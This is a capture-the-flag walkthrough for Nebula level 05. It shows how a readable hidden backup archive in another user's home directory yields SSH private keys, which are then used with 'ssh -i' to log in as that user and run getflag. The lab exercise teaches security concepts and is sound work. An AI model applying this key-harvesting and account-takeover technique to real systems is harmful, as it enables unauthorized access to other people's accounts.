Weak permissions
Nebula 05 Agenda: “Check the flag05 home directory. You are looking for weak directory permissions”
1 level05@nebula:~$ cd /home/flag05
2 level05@nebula:/home/flag05$ ls -la
3 total 5
4 drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 .
5 drwxr-xr-x 1 root root 100 2012-08-27 07:18 ..
6 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
7 -rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
8 -rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
9 -rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
10 drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh
11
12 level05@nebula:/home/flag05$ cd ./.backup/
13 level05@nebula:/home/flag05/.backup$ ls -la
14 total 2
15 drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .
16 drwxr-x--- 4 flag05 level05 93 2012-08-18 06:56 ..
17 -rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
18
19 level05@nebula:/home/flag05/.backup$ file backup-19072011.tgz
20 backup-19072011.tgz: gzip compressed data, from Unix, last modified:
21 Tue Jul 19 02:38:48 2011
22
23 level05@nebula:/home/flag05/.backup$ mkdir /tmp/flag05/
24 level05@nebula:/home/flag05/.backup$ cd /tmp/flag05/
25
26 level05@nebula:/tmp/flag05$ tar -xzvf /home/flag05/.backup/backup-19072011.tgz
27 .ssh/
28 .ssh/id_rsa.pub
29 .ssh/id_rsa
30 .ssh/authorized_keysTherefore the “weak” directory was the hidden “/home/flag05/.backup” folder. To extract archive we used tar utility (line #26). And as result we have public (“id_rsa.pub”) and private (“id_rsa”) ssh rsa keys. In an asymmetric key encryption scheme, anyone can encrypt messages using the public key, but only the holder of the paired private key can decrypt. Security depends on the secrecy of the private key. Now we can use OpenSSH SSH client with usage of identity(private key) to login as “flag05” user:
1 level05@nebula:/tmp/flag05$ ssh -i ./.ssh/id_rsa flag05@localhost
2
3 flag05@nebula:~$ getflag
4 You have successfully executed getflag on a target account
"